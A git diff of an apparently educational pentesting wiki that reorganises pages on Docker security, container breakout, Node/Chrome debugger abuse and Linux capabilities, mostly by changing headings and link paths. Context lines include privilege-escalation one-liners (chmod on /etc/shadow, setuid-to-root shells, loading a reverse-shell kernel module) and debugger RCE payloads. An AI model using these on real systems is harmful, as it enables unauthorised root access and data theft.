An authorization plugin **approves** or **denies** **requests** to the Docker **daemon** based on both the current **authentication** context and the **command** **context**. The **authentication** **context** contains all **user details** and the **authentication** **method**. The **command context** contains all the **relevant** **request** data.
@@ -194,9 +192,9 @@ An authorization plugin **approves** or **denies** **requests** to the Docker **
[authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md)
{% endcontent-ref %}
-# Interesting Docker Flags
+## Interesting Docker Flags
-## --privileged flag
+### --privileged flag
In the following page you can learn **what does the `--privileged` flag imply**:
@@ -204,9 +202,9 @@ In the following page you can learn **what does the `--privileged` flag imply**:
[docker-privileged.md](docker-privileged.md)
{% endcontent-ref %}
-## --security-opt
+### --security-opt
-### no-new-privileges
+#### no-new-privileges
If you are running a container where an attacker manages to get access as a low privilege user. If you have a **miss-configured suid binary**, the attacker may abuse it and **escalate privileges inside** the container. Which, may allow him to escape from it.
@@ -216,7 +214,7 @@ Running the container with the **`no-new-privileges`** option enabled will **pre
docker run -it --security-opt=no-new-privileges:true nonewpriv
```
-### Other
+#### Other
```bash
#You can manually add/drop capabilities with
@@ -235,9 +233,9 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv
For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)
-# Other Security Considerations
+## Other Security Considerations
-## Managing Secrets
+### Managing Secrets
First of all, **do not put them inside your image!**
@@ -290,19 +288,19 @@ Then start Compose as usual with `docker-compose up --build my_service`.
If you’re using [Kubernetes](https://kubernetes.io/docs/concepts/configuration/secret/), it has support for secrets. [Helm-Secrets](https://github.com/futuresimple/helm-secrets) can help make secrets management in K8s easier. Additionally, K8s has Role Based Access Controls (RBAC) — as does Docker Enterprise. RBAC makes access Secrets management more manageable and more secure for teams.
-## gVisor
+### gVisor
**gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers.
{% embed url="https://github.com/google/gvisor" %}
-## Kata Containers
+### Kata Containers
**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense.
{% embed url="https://katacontainers.io/" %}
-## Summary Tips
+### Summary Tips
* **Do not use the `--privileged` flag or mount a** [**Docker socket inside the container**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**.** The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag.
* Do **not run as root inside the container. Use a** [**different user**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **and** [**user namespaces**](https://docs.docker.com/engine/security/userns-remap/)**.** The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups.
@@ -319,15 +317,15 @@ If you’re using [Kubernetes](https://kubernetes.io/docs/concepts/configuration
* **Don’t put ssh** inside container, “docker exec” can be used to ssh to Container.
* Have **smaller** container **images**
-# Docker Breakout / Privilege Escalation
+## Docker Breakout / Privilege Escalation
If you are **inside a docker container** or you have access to a user in the **docker group**, you could try to **escape and escalate privileges**:
-{% content-ref url="docker-breakout-privilege-escalation.md" %}
-[docker-breakout-privilege-escalation.md](docker-breakout-privilege-escalation.md)
+{% content-ref url="docker-breakout-privilege-escalation/" %}
+[docker-breakout-privilege-escalation](docker-breakout-privilege-escalation/)
{% endcontent-ref %}
-# Docker Authentication Plugin Bypass
+## Docker Authentication Plugin Bypass
If you have access to the docker socket or have access to a user in the **docker group but your actions are being limited by a docker auth plugin**, check if you can **bypass it:**
@@ -335,12 +333,12 @@ If you have access to the docker socket or have access to a user in the **docker
[authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md)
{% endcontent-ref %}
-# Hardening Docker
+## Hardening Docker
* The tool [**docker-bench-security**](https://github.com/docker/docker-bench-security) is a script that checks for dozens of common best-practices around deploying Docker containers in production. The tests are all automated, and are based on the [CIS Docker Benchmark v1.3.1](https://www.cisecurity.org/benchmark/docker/).\
You need to run the tool from the host running docker or from a container with enough privileges. Find out **how to run it in the README:** [**https://github.com/docker/docker-bench-security**](https://github.com/docker/docker-bench-security).
-# References
+## References
* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
* [https://twitter.com/\_fel1x/status/1151487051986087936](https://twitter.com/\_fel1x/status/1151487051986087936)
@@ -352,7 +350,6 @@ If you have access to the docker socket or have access to a user in the **docker
* [https://en.wikipedia.org/wiki/Linux\_namespaces](https://en.wikipedia.org/wiki/Linux\_namespaces)
* [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57)
-
-
-
diff --git a/linux-unix/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md b/linux-hardening/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md
similarity index 91%
rename from linux-unix/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md
rename to linux-hardening/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md
index 587790fd..d044bef8 100644
--- a/linux-unix/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md
+++ b/linux-hardening/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md
@@ -1,4 +1,4 @@
-
+# Abusing Docker Socket for Privilege Escalation
[--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable]`** -> To [escalate abusing capabilities](../linux-capabilities.md), **grant that capability to the container** and disable other protection methods that may prevent the exploit to work.
-## Curl
+### Curl
In this page we have discussed ways to escalate privileges using docker flags, you can find **ways to abuse these methods using curl** command in the page:
@@ -60,7 +59,6 @@ In this page we have discussed ways to escalate privileges using docker flags, y
[authz-and-authn-docker-access-authorization-plugin.md](authz-and-authn-docker-access-authorization-plugin.md)
{% endcontent-ref %}
-
-
-
diff --git a/linux-unix/privilege-escalation/docker-breakout/apparmor.md b/linux-hardening/privilege-escalation/docker-breakout/apparmor.md
similarity index 100%
rename from linux-unix/privilege-escalation/docker-breakout/apparmor.md
rename to linux-hardening/privilege-escalation/docker-breakout/apparmor.md
diff --git a/linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md b/linux-hardening/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md
similarity index 100%
rename from linux-unix/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md
rename to linux-hardening/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md
diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md b/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md
similarity index 90%
rename from linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md
rename to linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md
index a904299b..d5a32062 100644
--- a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md
+++ b/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/README.md
@@ -1,4 +1,4 @@
-
+# Docker Breakout / Privilege Escalation
--all` or `nsenter --target --mount --net --pid --cgroup` to **run a shell with the same ns restrictions** (hopefully none) **as that process.**
{% endhint %}
-## hostNetwork
+### hostNetwork
```
docker run --rm -it --network=host ubuntu bash
@@ -426,11 +425,11 @@ Like in the following examples:
You will be able also to access **network services binded to localhost** inside the host or even access the **metadata permissions of the node** (which might be different those a container can access):
-{% content-ref url="../../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md" %}
-[kubernetes-access-to-other-clouds.md](../../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md)
+{% content-ref url="../../../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md" %}
+[kubernetes-access-to-other-clouds.md](../../../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md)
{% endcontent-ref %}
-## hostIPC
+### hostIPC
```
docker run --rm -it --ipc=host ubuntu bash
@@ -441,9 +440,9 @@ If you only have `hostIPC=true`, you most likely can't do much. If any process o
* **Inspect /dev/shm** - Look for any files in this shared memory location: `ls -la /dev/shm`
* **Inspect existing IPC facilities** – You can check to see if any IPC facilities are being used with `/usr/bin/ipcs`. Check it with: `ipcs -a`
-# CVEs
+## CVEs
-## Runc exploit (CVE-2019-5736)
+### Runc exploit (CVE-2019-5736)
In case you can execute `docker exec` as root (probably with sudo), you try to escalate privileges escaping from a container abusing CVE-2019-5736 (exploit [here](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)). This technique will basically **overwrite** the _**/bin/sh**_ binary of the **host** **from a container**, so anyone executing docker exec may trigger the payload.
@@ -460,9 +459,9 @@ For more information: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape
There are other CVEs the container can be vulnerable too, you can find a list in [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list)
{% endhint %}
-# Breakout Templates
+## Breakout Templates
-## Container Breakout through Usermode helper Template
+### Container Breakout through Usermode helper Template
If you are in **userspace** (**no kernel exploit** involved) the way to find new escapes mainly involve the following actions (these templates usually require a container in privileged mode):
@@ -474,7 +473,7 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
* Have **enough capabilities and disabled protections** to be able to abuse that functionality
* You might need to **mount things** o perform **special privileged actions** you cannot do in a default docker container
-# References
+## References
* [https://twitter.com/\_fel1x/status/1151487053370187776?lang=en-GB](https://twitter.com/\_fel1x/status/1151487053370187776?lang=en-GB)
* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
@@ -484,7 +483,6 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
* [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket)
* [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4)
-
-
-
diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
similarity index 100%
rename from linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
rename to linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md b/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
similarity index 100%
rename from linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
rename to linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts.md b/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts.md
similarity index 100%
rename from linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts.md
rename to linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts.md
diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md b/linux-hardening/privilege-escalation/docker-breakout/docker-privileged.md
similarity index 100%
rename from linux-unix/privilege-escalation/docker-breakout/docker-privileged.md
rename to linux-hardening/privilege-escalation/docker-breakout/docker-privileged.md
diff --git a/linux-unix/privilege-escalation/docker-breakout/namespaces.md b/linux-hardening/privilege-escalation/docker-breakout/namespaces.md
similarity index 100%
rename from linux-unix/privilege-escalation/docker-breakout/namespaces.md
rename to linux-hardening/privilege-escalation/docker-breakout/namespaces.md
diff --git a/linux-unix/privilege-escalation/docker-breakout/seccomp.md b/linux-hardening/privilege-escalation/docker-breakout/seccomp.md
similarity index 100%
rename from linux-unix/privilege-escalation/docker-breakout/seccomp.md
rename to linux-hardening/privilege-escalation/docker-breakout/seccomp.md
diff --git a/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
similarity index 94%
rename from linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md
rename to linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
index e9e79e0f..fc322d8b 100644
--- a/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md
+++ b/linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md
@@ -1,5 +1,7 @@
# Node inspector/CEF debug abuse
+## Node inspector/CEF debug abuse
+
-
-# Basic Information
+## Basic Information
When started with the `--inspect` switch, a Node.js process listens for a debugging client. By **default**, it will listen at host and port **`127.0.0.1:9229`**. Each process is also assigned a **unique** **UUID**.
@@ -55,7 +56,7 @@ When you start a debugged browser something like this will appear:
DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369
```
-## Browsers, WebSockets and same-origin policy
+### Browsers, WebSockets and same-origin policy
Websites open in a web-browser can make WebSocket and HTTP requests under the browser security model. An **initial HTTP connection** is necessary to **obtain a unique debugger session id**. The **same-origin-policy** **prevents** websites from being able to make **this HTTP connection**. For additional security against [**DNS rebinding attacks**](https://en.wikipedia.org/wiki/DNS\_rebinding)**,** Node.js verifies that the **'Host' headers** for the connection either specify an **IP address** or **`localhost`** or **`localhost6`** precisely.
@@ -63,7 +64,7 @@ Websites open in a web-browser can make WebSocket and HTTP requests under the br
This **security measures prevents exploiting the inspector** to run code by **just sending a HTTP request** (which could be done exploiting a SSRF vuln).
{% endhint %}
-## Starting inspector in running processes
+### Starting inspector in running processes
You can send the **signal SIGUSR1** to a running nodejs process to make it **start the inspector** in the default port. However, note that you need to have enough privileges, so this might grant you **privileged access to information inside the process** but no a direct privilege escalation.
@@ -76,7 +77,7 @@ kill -s SIGUSR1
This is useful in containers because **shutting down the process and starting a new one** with `--inspect` is **not an option** because the **container** will be **killed** with the process.
{% endhint %}
-## Connect to inspector/debugger
+### Connect to inspector/debugger
If you have access to a **Chromium base browser** you can connect accessing `chrome://inspect` or `edge://inspect` in Edge. Click the Configure button and ensure your **target host and port** are listed (Find an example in the following image of how to get RCE using one of the next sections examples).
@@ -106,10 +107,10 @@ The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefd
Note that **NodeJS RCE exploits won't work** if connected to a browser via [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) \*\*\*\* (you need to check the API to find interesting things to do with it).
{% endhint %}
-# RCE in NodeJS Debugger/Inspector
+## RCE in NodeJS Debugger/Inspector
{% hint style="info" %}
-If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/)
+If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/)
{% endhint %}
Some common ways to obtain **RCE** when you can **connect** to a Node **inspector** is using something like (looks that this **won't work in a connection to Chrome DevTools protocol**):
@@ -121,12 +122,12 @@ require('child_process').spawnSync('calc.exe')
Browser.open(JSON.stringify({url: "c:\\windows\\system32\\calc.exe"}))
```
-# Chrome DevTools Protocol Payloads
+## Chrome DevTools Protocol Payloads
You can check the API here: [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)\
In this section I will just list interesting things I find people have used to exploit this protocol.
-## Overwrite Files
+### Overwrite Files
Change the folder where **downloaded files are going to be saved** and download a file to **overwrite** frequently used **source code** of the application with your **malicious code**.
@@ -142,11 +143,11 @@ ws.send(JSON.stringify({
}));
```
-## Webdriver RCE and exfiltration
+### Webdriver RCE and exfiltration
According to this post: [https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148](https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148) it's possible to obtain RCE and exfiltrate internal pages from theriver.
-## Post-Exploitation
+### Post-Exploitation
In a real environment and **after compromising** a user PC that uses Chrome/Chromium based browser you could launch a Chrome process with the **debugging activated and port-forward the debugging port** so you can access it. This way you will be able to **inspect everything the victim does with Chrome and steal sensitive information**.
@@ -156,7 +157,7 @@ The stealth way is to **terminate every Chrome process** and then call something
Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
```
-# References
+## References
* [https://www.youtube.com/watch?v=iwR746pfTEc\&t=6345s](https://www.youtube.com/watch?v=iwR746pfTEc\&t=6345s)
* [https://github.com/taviso/cefdebug](https://github.com/taviso/cefdebug)
diff --git a/linux-unix/privilege-escalation/escaping-from-limited-bash.md b/linux-hardening/privilege-escalation/escaping-from-limited-bash.md
similarity index 100%
rename from linux-unix/privilege-escalation/escaping-from-limited-bash.md
rename to linux-hardening/privilege-escalation/escaping-from-limited-bash.md
diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
similarity index 100%
rename from linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md
rename to linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
similarity index 100%
rename from linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
rename to linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
diff --git a/linux-unix/privilege-escalation/ld.so.conf-example.md b/linux-hardening/privilege-escalation/ld.so.conf-example.md
similarity index 100%
rename from linux-unix/privilege-escalation/ld.so.conf-example.md
rename to linux-hardening/privilege-escalation/ld.so.conf-example.md
diff --git a/linux-unix/privilege-escalation/linux-active-directory.md b/linux-hardening/privilege-escalation/linux-active-directory.md
similarity index 92%
rename from linux-unix/privilege-escalation/linux-active-directory.md
rename to linux-hardening/privilege-escalation/linux-active-directory.md
index 7c18896b..0c13db0f 100644
--- a/linux-unix/privilege-escalation/linux-active-directory.md
+++ b/linux-hardening/privilege-escalation/linux-active-directory.md
@@ -1,4 +1,4 @@
-
+# Linux Active Directory
-
-
diff --git a/linux-unix/privilege-escalation/linux-capabilities.md b/linux-hardening/privilege-escalation/linux-capabilities.md
similarity index 98%
rename from linux-unix/privilege-escalation/linux-capabilities.md
rename to linux-hardening/privilege-escalation/linux-capabilities.md
index 00d95f41..36781f54 100644
--- a/linux-unix/privilege-escalation/linux-capabilities.md
+++ b/linux-hardening/privilege-escalation/linux-capabilities.md
@@ -1,5 +1,7 @@
# Linux Capabilities
+## Linux Capabilities
+
-
Linux capabilities **provide a subset of the available root privileges** to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation.
-# Why capabilities?
+## Why capabilities?
To better understand how Linux capabilities work, let’s have a look first at the problem it tries to solve.
Let’s assume we are running a process as a normal user. This means we are non-privileged. We can only access data that owned by us, our group, or which is marked for access by all users. At some point in time, our process needs a little bit more permissions to fulfill its duties, like opening a network socket. The problem is that normal users can not open a socket, as this requires root permissions.
-# Capabilities Sets
+## Capabilities Sets
**Inherited capabilities**
@@ -44,9 +45,9 @@ For a detailed explanation of the difference between capabilities in threads and
* [https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work)
* [https://blog.ploetzli.ch/2014/understanding-linux-capabilities/](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/)
-# Processes & Binaries Capabilities
+## Processes & Binaries Capabilities
-## Processes Capabilities
+### Processes Capabilities
To see the capabilities for a particular process, use the **status** file in the /proc directory. As it provides more details, let’s limit it only to the information related to Linux capabilities.\
Note that for all running processes capability information is maintained per thread, for binaries in the file system it’s stored in extended attributes.
@@ -127,7 +128,7 @@ $ capsh --decode=0000000000003000
As you can see the given capabilities corresponds with the results of the 2 ways of getting the capabilities of a binary.\
The _getpcaps_ tool uses the **capget()** system call to query the available capabilities for a particular thread. This system call only needs to provide the PID to obtain more information.
-## Binaries Capabilities
+### Binaries Capabilities
Binaries can have capabilities that can be used while executing. For example, it's very common to find `ping` binary with `cap_net_raw` capability:
@@ -142,7 +143,7 @@ You can **search binaries with capabilities** using:
getcap -r / 2>/dev/null
```
-## Dropping capabilities with capsh
+### Dropping capabilities with capsh
If we drop the CAP\_NET\_RAW capabilities for _ping_, then the ping utility should no longer work.
@@ -156,7 +157,7 @@ Besides the output of _capsh_ itself, the _tcpdump_ command itself should also r
The error clearly shows that the ping command is not allowed to open an ICMP socket. Now we know for sure that this works as expected.
-## Remove Capabilities
+### Remove Capabilities
You can remove capabilities of a binary with
@@ -164,7 +165,7 @@ You can remove capabilities of a binary with
setcap -r
```
-# User Capabilities
+## User Capabilities
Apparently **it's possible to assign capabilities also to users**. This probably means that every process executed by the user will be able to use the users capabilities.\
Base on on [this](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [this ](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)and [this ](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user)a few files new to be configured to give a user certain capabilities but the one assigning the capabilities to each user will be `/etc/security/capability.conf`.\
@@ -184,7 +185,7 @@ cap_net_admin,cap_net_raw jrnetadmin
cap_sys_admin,22,25 jrsysadmin
```
-# Environment Capabilities
+## Environment Capabilities
Compiling the following program it's possible to **spawn a bash shell inside an environment that provides capabilities**.
@@ -297,11 +298,11 @@ Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip
You can **only add capabilities that are present** in both the permitted and the inheritable sets.
{% endhint %}
-## Capability-aware/Capability-dumb binaries
+### Capability-aware/Capability-dumb binaries
The **capability-aware binaries won't use the new capabilities** given by the environment, however the **capability dumb binaries will us**e them as they won't reject them. This makes capability-dumb binaries vulnerable inside a special environment that grant capabilities to binaries.
-# Service Capabilities
+## Service Capabilities
By default a **service running as root will have assigned all the capabilities**, and in some occasions this may be dangerous.\
Therefore, a **service configuration** file allows to **specify** the **capabilities** you want it to have, **and** the **user** that should execute the service to avoid running a service with unnecessary privileges:
@@ -312,7 +313,7 @@ User=bob
AmbientCapabilities=CAP_NET_BIND_SERVICE
```
-# Capabilities in Docker Containers
+## Capabilities in Docker Containers
By default Docker assigns a few capabilities to the containers. It's very easy to check which capabilities are these by running:
@@ -331,7 +332,7 @@ docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash
docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash
```
-# Privesc/Container Escape
+## Privesc/Container Escape
Capabilities are useful when you **want to restrict your own processes after performing privileged operations** (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root.
@@ -354,7 +355,7 @@ To identify programs in a system or folder with capabilities:
getcap -r / 2>/dev/null
```
-## Exploitation example
+### Exploitation example
In the following example the binary `/usr/bin/python2.6` is found vulnerable to privesc:
@@ -374,7 +375,7 @@ getcap /usr/sbin/tcpdump
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
```
-## The special case of "empty" capabilities
+### The special case of "empty" capabilities
Note that one can assign empty capability sets to a program file, and thus it is possible to create a set-user-ID-root program that changes the effective and saved set-user-ID of the process that executes the program to 0, but confers no capabilities to that process. Or, simply put, if you have a binary that:
@@ -384,7 +385,7 @@ Note that one can assign empty capability sets to a program file, and thus it is
then **that binary will run as root**.
-# CAP\_SYS\_ADMIN
+## CAP\_SYS\_ADMIN
[**CAP\_SYS\_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) is largely a catchall capability, it can easily lead to additional capabilities or full root (typically access to all capabilities). `CAP_SYS_ADMIN` is required to perform a range of **administrative operations**, which is difficult to drop from containers if privileged operations are performed within the container. Retaining this capability is often necessary for containers which mimic entire systems versus individual application containers which can be more restrictive. Among other things this allows to **mount devices** or abuse **release\_agent** to escape from the container.
@@ -474,7 +475,7 @@ chroot /mnt/ adduser john
ssh john@172.17.0.1 -p 2222
```
-# CAP\_SYS\_PTRACE
+## CAP\_SYS\_PTRACE
**This means that you can escape the container by injecting a shellcode inside some process running inside the host.** To access processes running inside the host the container needs to be run at least with **`--pid=host`**.
@@ -612,7 +613,7 @@ gdb -p 1234
You won’t be able to see the output of the command executed but it will be executed by that process (so get a rev shell).
-# CAP\_SYS\_MODULE
+## CAP\_SYS\_MODULE
[**CAP\_SYS\_MODULE**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows the process to load and unload arbitrary kernel modules (`init_module(2)`, `finit_module(2)` and `delete_module(2)` system calls). This could lead to trivial privilege escalation and ring-0 compromise. The kernel can be modified at will, subverting all system security, Linux Security Modules, and container systems.\
**This means that you can** **insert/remove kernel modules in/from the kernel of the host machine.**
@@ -746,7 +747,7 @@ insmod reverse-shell.ko #Launch the reverse shell
Another example of this technique can be found in [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host)
-# CAP\_DAC\_READ\_SEARCH
+## CAP\_DAC\_READ\_SEARCH
[**CAP\_DAC\_READ\_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows a process to **bypass file read, and directory read and execute permissions**. While this was designed to be used for searching or reading files, it also grants the process permission to invoke `open_by_handle_at(2)`. Any process with the capability `CAP_DAC_READ_SEARCH` can use `open_by_handle_at(2)` to gain access to any file, even files outside their mount namespace. The handle passed into `open_by_handle_at(2)` is intended to be an opaque identifier retrieved using `name_to_handle_at(2)`. However, this handle contains sensitive and tamperable information, such as inode numbers. This was first shown to be an issue in Docker containers by Sebastian Krahmer with [shocker](https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) exploit.\
**This means that you can** **bypass can bypass file read permission checks and directory read/execute permission checks.**
@@ -956,11 +957,11 @@ int main(int argc,char* argv[] )
I exploit needs to find a pointer to something mounted on the host. The original exploit used the file /.dockerinit and this modified version uses /etc/hostname. If the exploit isn't working maybe you need to set a different file. To find a file that is mounted in the host just execute mount command:
{% endhint %}
- (1).png>)
+ (2).png>)
**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)
-# CAP\_DAC\_OVERRIDE
+## CAP\_DAC\_OVERRIDE
**This mean that you can bypass write permission checks on any file, so you can write any file.**
@@ -1150,7 +1151,7 @@ In order to scape the docker container you could **download** the files `/etc/sh
**The code of this technique was copied from the laboratory of "Abusing DAC\_OVERRIDE Capability" from** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com)
-# CAP\_CHOWN
+## CAP\_CHOWN
**This means that it's possible to change the ownership of any file.**
@@ -1168,7 +1169,7 @@ Or with the **`ruby`** binary having this capability:
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
```
-# CAP\_FOWNER
+## CAP\_FOWNER
**This means that it's possible to change the permission of any file.**
@@ -1180,7 +1181,7 @@ If python has this capability you can modify the permissions of the shadow file,
python -c 'import os;os.chmod("/etc/shadow",0666)
```
-## CAP\_SETUID
+### CAP\_SETUID
**This means that it's possible to set the effective user id of the created process.**
@@ -1205,7 +1206,7 @@ os.setuid(0)
os.system("/bin/bash")
```
-# CAP\_SETGID
+## CAP\_SETGID
**This means that it's possible to set the effective group id of the created process.**
@@ -1240,7 +1241,7 @@ cat /etc/shadow
If **docker** is installed you could **impersonate** the **docker group** and abuse it to communicate with the [**docker socket** and escalate privileges](./#writable-docker-socket).
-# CAP\_SETFCAP
+## CAP\_SETFCAP
**This means that it's possible to set capabilities on files and processes**
@@ -1318,13 +1319,13 @@ However, Docker also grants the **CAP\_SETPCAP** by default, so you might be abl
However, in the documentation of this cap: _CAP\_SETPCAP : \[…] **add any capability from the calling thread’s bounding** set to its inheritable set_.\
It looks like we can only add to the inheritable set capabilities from the bounding set. Which means that **we cannot put new capabilities like CAP\_SYS\_ADMIN or CAP\_SYS\_PTRACE in the inherit set to escalate privileges**.
-# CAP\_SYS\_RAWIO
+## CAP\_SYS\_RAWIO
[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to descriptively `perform a range of device-specific operations on other devices`.
This can be useful for **privilege escalation** and **Docker breakout.**
-# CAP\_KILL
+## CAP\_KILL
**This means that it's possible to kill any process.**
@@ -1353,7 +1354,7 @@ kill -s SIGUSR1
